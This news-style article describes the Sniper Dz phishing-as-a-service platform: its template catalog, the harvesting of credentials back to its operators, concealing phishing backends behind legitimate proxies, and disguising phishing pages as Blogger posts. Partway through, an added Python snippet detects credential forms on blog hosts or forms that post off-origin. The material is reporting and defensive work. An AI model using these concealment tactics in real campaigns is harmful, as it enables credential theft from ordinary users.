In the past year, the phishing-as-a-service (PhaaS) platform known as Sniper Dz has facilitated over 140,000 cyberattacks. The free platform offers tools to help cybercriminals target user credentials, making phishing campaigns easier to launch even for those with limited skills. Its activities are linked to widespread credential theft across multiple online platforms.
The Growth of Sniper Dz and Its Role in Phishing
Sniper Dz stands out as a PhaaS that works for both novice and experienced cybercriminals. According to research by Unit 42 at Palo Alto Networks, Sniper Dz provides an admin panel where users can access a catalog of phishing pages. These pages can either be hosted on Sniper Dz’s infrastructure or downloaded and hosted on the attackers’ own servers. As a result, the platform’s ease of use and flexibility have made it a popular choice, with over 7,170 subscribers on its dedicated Telegram channel as of October 2024.
One of the reasons for Sniper Dz’s success is its ability to offer free services that allow attackers to collect login credentials from victims. Once harvested, the stolen data is sent back to the PhaaS platform, a tactic that Microsoft has termed “double theft.” This means that platform users benefit from the stolen credentials, but so do the operators of Sniper Dz, who are able to access these credentials on a larger scale.
The platform’s Telegram channel is active in sharing phishing-related resources and techniques, with videos that detail how to use Sniper Dz templates to create fake login pages for popular sites like Facebook, Instagram, and gaming platforms such as PUBG and Free Fire. These multilingual templates, available in English, Arabic, and French, make Sniper Dz a global threat.
Tactics for Concealment and Avoiding Detection
Sniper Dz employs various techniques to hide its activities. The platform uses legitimate proxy servers (e.g., proxymesh[.]com) to mask the backend servers hosting phishing content. When victims are redirected to a phishing page, their browsers interact only with the proxy server, making it difficult for security researchers to track the origin of the attack. This tactic helps protect the backend servers.
For users who wish to self-host their phishing pages, Sniper Dz provides downloadable HTML templates. The platform also offers tools to convert phishing templates into formats compatible with platforms like Google Blogger, which allows attackers to disguise their malicious content as legitimate blog posts. This approach is effective in evading detection since blog hosting platforms are less likely to be scrutinized than traditional phishing domains.
Unit 42 researchers noted an increase in phishing activity facilitated by Sniper Dz starting in mid-2024, targeting users primarily in the United States. Once user credentials are stolen through these campaigns, they are collected and displayed on Sniper Dz’s centralized admin panel, which the platform operators and their users can access.
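
A defender-side check for the Blogger-hosting tactic described above, as an added example that is not from Unit 42 or the original article: it flags a password form served from a blog-hosting domain or posting to a different host than the page. The `.blogspot.com` suffix list, the function names and the sample hosts are assumptions, and it assumes the kit uses a plain HTML form rather than script-based exfiltration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: blog-hosting suffixes where a login form is unexpected.
BLOG_HOST_SUFFIXES = (".blogspot.com",)

class FormAudit(HTMLParser):
    """Record each form's action and whether it holds a password input."""
    def __init__(self):
        super().__init__()
        self.forms = []   # [action, has_password] per form
        self._open = None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = [a.get("action") or "", False]
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open[1] = True
    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit_page(page_url, html):
    """Return one list of reasons per suspicious password form."""
    page_host = (urlparse(page_url).hostname or "").lower()
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for action, has_pw in parser.forms:
        if not has_pw:
            continue
        # An empty or relative action resolves to the page's own host.
        target = (urlparse(urljoin(page_url, action)).hostname or "").lower()
        reasons = []
        if page_host.endswith(BLOG_HOST_SUFFIXES):
            reasons.append("password form on blog-hosting domain")
        if target != page_host:
            reasons.append("credentials posted off-origin to " + target)
        if reasons:
            findings.append(reasons)
    return findings

# Constructed sample with placeholder hosts.
SAMPLE_URL = "https://example-post.blogspot.com/2024/10/login.html"
SAMPLE_HTML = ('<form action="https://collector.example.net/submit" method="post">'
               '<input name="user"><input type="password" name="pass"></form>')
print(audit_page(SAMPLE_URL, SAMPLE_HTML))
```

A same-origin login form on an ordinary site returns no findings, so the check can run over crawled or user-reported URLs as a triage signal rather than a verdict.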
The Rising Popularity of PhaaS Platforms
Phishing-as-a-service platforms like Sniper Dz are becoming an increasingly popular option for aspiring cybercriminals. These platforms lower the entry barriers for phishing attacks by offering ready-made templates, automated tools, and online support. This trend is seen across Telegram channels, where PhaaS providers promote their services and provide tutorials to ensure that even inexperienced users can run phishing campaigns.
Sniper Dz is only one of several cyber threats that have gained momentum this year, with other groups like Storm-0501 having targeted infrastructure through their ransomware attacks on hybrid cloud environments. Sniper Dz is an example of how phishing has evolved to become more accessible and scalable, making it easy for even low-skilled actors to launch attacks against unsuspecting victims. With ready-to-use kits available on demand, cybercriminals no longer need advanced coding skills to successfully steal user credentials or engage in fraudulent activities.
How Cybercriminals Use Sniper Dz to Target Victims
The phishing templates provided by Sniper Dz often mimic well-known brands and platforms to trick victims into entering their credentials. These templates cover a variety of online services, including social media (e.g., Facebook, Instagram), messaging apps (e.g., Skype, Snapchat), streaming services (e.g., Netflix), and gaming platforms. Once a victim enters their information into a fake login page, the details are instantly captured and transmitted to the attackers.
The platform’s phishing pages are hosted behind a legitimate proxy server, making them difficult to detect. Additionally, Sniper Dz uses a centralized system to collect and track stolen credentials. This enables a coordinated approach to data theft and allows operators to manage stolen data in an organized way.
The rise of platforms like Sniper Dz illustrates how PhaaS is changing cybercrime. By providing resources and a support structure for phishing attacks, PhaaS platforms allow a wider range of threat actors to conduct credential theft and other malicious activities. These platforms are further supported by underground forums and social media channels, where attackers can learn and exchange best practices.
The tactics used by Sniper Dz, such as using legitimate proxy servers and downloadable phishing templates, have made phishing attacks harder to trace. This evolution is a challenge for cybersecurity professionals, who must now contend both with these harder-to-trace methods of phishing and with a growing number of attackers using PhaaS platforms.
Sniper Dz is an example of how phishing-as-a-service platforms are allowing cybercriminals to conduct large-scale phishing attacks without requiring technical expertise.